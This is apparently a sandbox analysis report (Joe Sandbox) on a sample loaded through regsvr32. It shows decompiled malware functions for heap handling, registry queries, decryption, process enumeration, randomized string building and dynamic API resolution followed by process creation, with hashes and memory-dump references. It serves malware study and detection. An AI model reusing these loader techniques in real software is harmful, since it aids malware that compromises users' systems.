Uniqueness Score: -1.00%

Function 007A5C4E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A5C4E(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x7aa290, 0, _a4); // executed
				return _t2;
			}

0x007a5c5a
0x007a5c60

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78a371ff1ab27898f08ba0dbd25db84fa37fc2d85c2513cdf89858de6590c25c
Instruction ID: 90bfc211c7e2da3394ef6b34c4154d7fa897e42c9d2e5e35b1af9d1dc5d465a7
Opcode Fuzzy Hash: 78a371ff1ab27898f08ba0dbd25db84fa37fc2d85c2513cdf89858de6590c25c
Instruction Fuzzy Hash: 3CB01235404100BBCA024B40DD04F877B22B7D5B00F00C010B308440B0C3360430EB0E

Uniqueness

Uniqueness Score: -1.00%

Function 007A2A03, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A2A03(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x7aa290, 0, _a4); // executed
				return _t2;
			}

0x007a2a0f
0x007a2a15

APIs

RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 26f0da27a8f309941ff7ee79bbd20e971ea319f6c6d76cffee1a9dcd62836eb1
Instruction ID: fa5d3a2baffcf1ada8b18fdf6ca7042c3385502d7495577fcdd1be362ac2d125
Opcode Fuzzy Hash: 26f0da27a8f309941ff7ee79bbd20e971ea319f6c6d76cffee1a9dcd62836eb1
Instruction Fuzzy Hash: 25B01231004100FBCE424B40DD08F067B22B7D1B00F01C010B304000B083360430EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 007A30AD, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A30AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E007A4BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E007A5419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x7aa290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x007a30b5
0x007a310a
0x007a310f
0x007a30b7
0x007a30d1
0x007a30d5
0x007a30da
0x007a30dc
0x007a30ec
0x007a30f8
0x007a30de
0x007a30de
0x007a30e1
0x007a30e6
0x007a30e6
0x007a30dc
0x007a30d5
0x007a3115

APIs

Part of subcall function 007A5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43,80000002), ref: 007A545B
Part of subcall function 007A5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43), ref: 007A5480
Part of subcall function 007A5419: RegCloseKey.ADVAPI32(80000002,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43,80000002,00000000,?), ref: 007A54B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,007A4A79,?,004F0053,05299338,00000000,?), ref: 007A30F8

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: e612fc9d8bba8b25f1fb62e6fd8369b3e0a79d49f37476c640a7e39eb2d665e7
Instruction ID: 1c5b06a31a991a0eb2714e6a862ba0930c28e1dd1e04dc194a1a936b13a006f6
Opcode Fuzzy Hash: e612fc9d8bba8b25f1fb62e6fd8369b3e0a79d49f37476c640a7e39eb2d665e7
Instruction Fuzzy Hash: DD01F63220064DFBCF129F44CC46FAA7BAAFBD5350F248529FA198A161D675DA20DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007A5872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E007A5872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x007a5872
0x007a587f
0x007a5880
0x007a5881
0x007a5888
0x007a58b6
0x007a58b7
0x007a58ba
0x007a58c0
0x00000000
0x00000000
0x007a589f
0x007a58a9
0x007a58b0
0x00000000
0x007a58a1
0x007a58a4
0x007a58c4
0x007a58a6
0x007a58a6
0x00000000
0x007a58a6
0x007a58a4
0x007a58cb
0x007a58d1
0x007a58d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 007A58BA

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c9135e42ead80b5295a37457dd2f02f3f77f851550945729a1bfb8ef95ed7f11
Instruction ID: 2b25a3e028bcff2634b229c49dd039cebc84ef1740bc73ab14ae6bf9e189b784
Opcode Fuzzy Hash: c9135e42ead80b5295a37457dd2f02f3f77f851550945729a1bfb8ef95ed7f11
Instruction Fuzzy Hash: D3F04971C01618EFDB00DB94C888AEDB7B8EF46305F1085AAE602A3240D3BC6B84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 007A1AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E007A1AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E007A35A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E007A5C4E(_a8 + _a8);
					if(_t21 != 0) {
						E007A4502(_a4, _t21, _t23);
					}
					E007A2A03(_a4);
				}
				return _t21;
			}

0x007a1af9
0x007a1b00
0x007a1b02
0x007a1b11
0x007a1b18
0x007a1b27
0x007a1b2b
0x007a1b32
0x007a1b32
0x007a1b3a
0x007a1b3f
0x007a1b44

APIs

lstrlen.KERNEL32(00000000,00000000,007A6301,00000000,?,007A5B47,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A1B02

Part of subcall function 007A35A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007A1B16,00000001,007A6301,00000000), ref: 007A35D9
Part of subcall function 007A35A1: memcpy.NTDLL(007A1B16,007A6301,00000010,?,?,?,007A1B16,00000001,007A6301,00000000,?,007A5B47,00000000,007A6301,?,00000000), ref: 007A35F2
Part of subcall function 007A35A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007A361B
Part of subcall function 007A35A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007A3633
Part of subcall function 007A35A1: memcpy.NTDLL(00000000,00000000,05299630,00000010), ref: 007A3685

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 13f38d59ee3bbe6ae1d3332d859ce4ec2d3feff29716df140161e07f31f9ca0e
Instruction ID: adaa6ea6908d9605e71972809347c924c83c17d07fda2d3b31c3b23c6c16c6b6
Opcode Fuzzy Hash: 13f38d59ee3bbe6ae1d3332d859ce4ec2d3feff29716df140161e07f31f9ca0e
Instruction Fuzzy Hash: CEF05E76100109BBDF116F69DC09CEB3BADEFC63A0F008122FD19CA111EA35DA659BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A45E6, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A45E6(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E007A1896(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E007A2A03(_a4);
				}
				return _t13;
			}

0x007a45f2
0x007a45f7
0x007a45fb
0x007a4602
0x007a460d
0x007a4611
0x007a4611
0x007a461a

APIs

Part of subcall function 007A1896: memcpy.NTDLL(00000000,00000110,007A1C1F,007A1C1F,?,?,007A1C1F,?,?,007A24E4,?), ref: 007A18CC
Part of subcall function 007A1896: memset.NTDLL ref: 007A1942
Part of subcall function 007A1896: memset.NTDLL ref: 007A1956

memcpy.NTDLL(007A1C1F,007A1C1F,00000000,007A1C1F,007A1C1F,007A1C1F,?,?,007A24E4,?,?,007A1C1F,?), ref: 007A4602

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction ID: e4c1bc5c71711a1871c3d444c8adae509c8beab818d85360a9f74efbcc25accb
Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction Fuzzy Hash: D8E08636804118BBC7126A98DC01DEB7F6C8F877D0F004110FE084A102E639D61093E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 007A19E7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007A19E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x7aa2d0; // 0x4aed5a8
						_t2 = _t9 + 0x7abe04; // 0x73617661
						_push( &_v264);
						if( *0x7aa11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x007a19f2
0x007a19fc
0x007a1a00
0x007a1a0a
0x007a1a3b
0x007a1a11
0x007a1a16
0x007a1a23
0x007a1a2c
0x007a1a43
0x007a1a2e
0x007a1a36
0x00000000
0x007a1a36
0x007a1a44
0x007a1a45
0x00000000
0x007a1a45
0x00000000
0x007a1a3f
0x007a1a4b
0x007a1a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007A19F7
Process32First.KERNEL32(00000000,?), ref: 007A1A0A
Process32Next.KERNEL32(00000000,?), ref: 007A1A36
CloseHandle.KERNEL32(00000000), ref: 007A1A45

Strings

8sz, xrefs: 007A19E7

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: 8sz
API String ID: 420147892-1643896621
Opcode ID: 15e65e13fc23d721c732b7efc14f32515eb80031a06825ac8c062e3c2fb0d2aa
Instruction ID: 905d3c602c24f3d8172265bd2fd445ec2f95086ae0148e33e2d370b53b568607
Opcode Fuzzy Hash: 15e65e13fc23d721c732b7efc14f32515eb80031a06825ac8c062e3c2fb0d2aa
Instruction Fuzzy Hash: 07F0BB765021146AE720A7368C49EEB76BCEBC7310F404261F506D3001EB3CD946C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E2D42, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4E2D86

Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C3A
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C4C
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C5E
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C70
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C82
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C94
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CA6
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CB8
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CCA
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CDC
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CEE
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D00
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D12

_free.LIBCMT ref: 6D4E2D7B

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E2D9D
_free.LIBCMT ref: 6D4E2DB2
_free.LIBCMT ref: 6D4E2DBD
_free.LIBCMT ref: 6D4E2DDF
_free.LIBCMT ref: 6D4E2DF2
_free.LIBCMT ref: 6D4E2E00
_free.LIBCMT ref: 6D4E2E0B
_free.LIBCMT ref: 6D4E2E43
_free.LIBCMT ref: 6D4E2E4A
_free.LIBCMT ref: 6D4E2E67
_free.LIBCMT ref: 6D4E2E7F

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction ID: 277729690970b8ab667a7af377833be38c685df301199059b0a0792b7c5bbe60
Opcode Fuzzy Hash: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction Fuzzy Hash: 64313D31908213BFEB319A39D880F6773E5AF00396F218829E565DB290DF34EC40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD9B0, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDAAB
type_info::operator==.LIBVCRUNTIME ref: 6D4DDAD2
___TypeMatch.LIBVCRUNTIME ref: 6D4DDBDE
CatchIt.LIBVCRUNTIME ref: 6D4DDC33
IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDCB9
_UnwindNestedFrames.LIBCMT ref: 6D4DDD40
CallUnexpected.LIBVCRUNTIME ref: 6D4DDD5B

Strings

csm, xrefs: 6D4DD9EB
csm, xrefs: 6D4DDA58
csm, xrefs: 6D4DDB09

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction ID: 176e4d4c6c2e9c8f131b534a43e6d06ade16242f21e31706bf85169b17c038fd
Opcode Fuzzy Hash: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction Fuzzy Hash: 61C1667180830A9BCF55CFA4C9A0EAEBBB4BF84718F11415AE9156B311D371EE52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 007A762C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E007A762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x7aa38c; // 0x5299cb0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E007A5F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x7a91cc;
				}
				_t46 = E007A43FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E007A5C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x7aa2d0; // 0x4aed5a8
						_t16 = _t75 + 0x7abad8; // 0x530025
						 *0x7aa13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E007A5F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x7a91d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E007A5C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E007A2A03(_v20);
						} else {
							_t66 =  *0x7aa2d0; // 0x4aed5a8
							_t31 = _t66 + 0x7abbf8; // 0x73006d
							 *0x7aa13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E007A2A03(_v12);
				}
				return _v24;
			}

0x007a7634
0x007a763a
0x007a7641
0x007a7647
0x007a764b
0x007a764f
0x007a7652
0x007a7659
0x007a765c
0x007a765e
0x007a765e
0x007a7667
0x007a766e
0x007a7671
0x007a7677
0x007a7681
0x007a768a
0x007a7691
0x007a76aa
0x007a76b1
0x007a76b4
0x007a76bd
0x007a76c6
0x007a76d7
0x007a76e0
0x007a76e4
0x007a76e8
0x007a76ef
0x007a76f2
0x007a76f4
0x007a76f4
0x007a76fe
0x007a7707
0x007a770e
0x007a7726
0x007a772a
0x007a7767
0x007a772c
0x007a772f
0x007a7737
0x007a7748
0x007a7754
0x007a775c
0x007a7760
0x007a7760
0x007a772a
0x007a776f
0x007a7774
0x007a777b

APIs

GetTickCount.KERNEL32 ref: 007A7641
lstrlen.KERNEL32(?,80000002,00000005), ref: 007A7681
lstrlen.KERNEL32(00000000), ref: 007A768A
lstrlen.KERNEL32(00000000), ref: 007A7691
lstrlenW.KERNEL32(80000002), ref: 007A769E
lstrlen.KERNEL32(?,00000004), ref: 007A76FE
lstrlen.KERNEL32(?), ref: 007A7707
lstrlen.KERNEL32(?), ref: 007A770E
lstrlenW.KERNEL32(?), ref: 007A7715

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

Strings

-tz, xrefs: 007A7632

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID: -tz
API String ID: 2535036572-878127217
Opcode ID: 386ac93613f39b7b626be312a85b2f6bb88c6a20c957b4246851627bc89c0250
Instruction ID: 169cbe633192a4920bb303ce5297c1956c82d6ab6aecc3efd92ba6d8a132921a
Opcode Fuzzy Hash: 386ac93613f39b7b626be312a85b2f6bb88c6a20c957b4246851627bc89c0250
Instruction Fuzzy Hash: 8F415972800219FBCF11AFA4CD08E9EBBB5EF85304F058160ED04A7222D7399A25EB95

Uniqueness

Uniqueness Score: -1.00%

Function 007A7836, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E007A7836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t71 =  *((intOrPtr*)(__eax + 0x14));
				_t39 = E007A71A3(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E007A7973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x7aa2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x7aa2d0; // 0x4aed5a8
					_t18 = _t50 + 0x7ab55b; // 0x73797325
					_t52 = E007A1000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x7aa2d0; // 0x4aed5a8
						_t20 = _t53 + 0x7ab73d; // 0x5298ce5
						_t21 = _t53 + 0x7ab0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x7aa290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E007A2A03(_t76);
				goto L12;
			}

0x007a783f
0x007a784d
0x007a7856
0x007a7859
0x007a796b
0x007a7972
0x007a7972
0x007a7868
0x007a7870
0x007a7875
0x007a7878
0x007a788d
0x007a7893
0x007a7894
0x007a7897
0x007a789d
0x007a78a0
0x007a78a5
0x007a78ad
0x007a78b4
0x007a78bb
0x007a78be
0x007a7952
0x007a78c4
0x007a78c4
0x007a78c9
0x007a78d0
0x007a78e4
0x007a78e8
0x007a7939
0x007a78ea
0x007a78ea
0x007a78f1
0x007a78f8
0x007a7910
0x007a7916
0x007a791a
0x007a7934
0x007a791c
0x007a7925
0x007a792a
0x007a792a
0x007a791a
0x007a794a
0x007a794a
0x007a78be
0x007a7959
0x007a7962
0x007a7966
0x00000000

APIs

Part of subcall function 007A71A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,007A7852,?,?,?,?,00000000,00000000), ref: 007A71C8
Part of subcall function 007A71A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 007A71EA
Part of subcall function 007A71A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 007A7200
Part of subcall function 007A71A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007A7216
Part of subcall function 007A71A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007A722C
Part of subcall function 007A71A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007A7242

memset.NTDLL ref: 007A78A0

Part of subcall function 007A1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,007A4F1C,73797325), ref: 007A1011
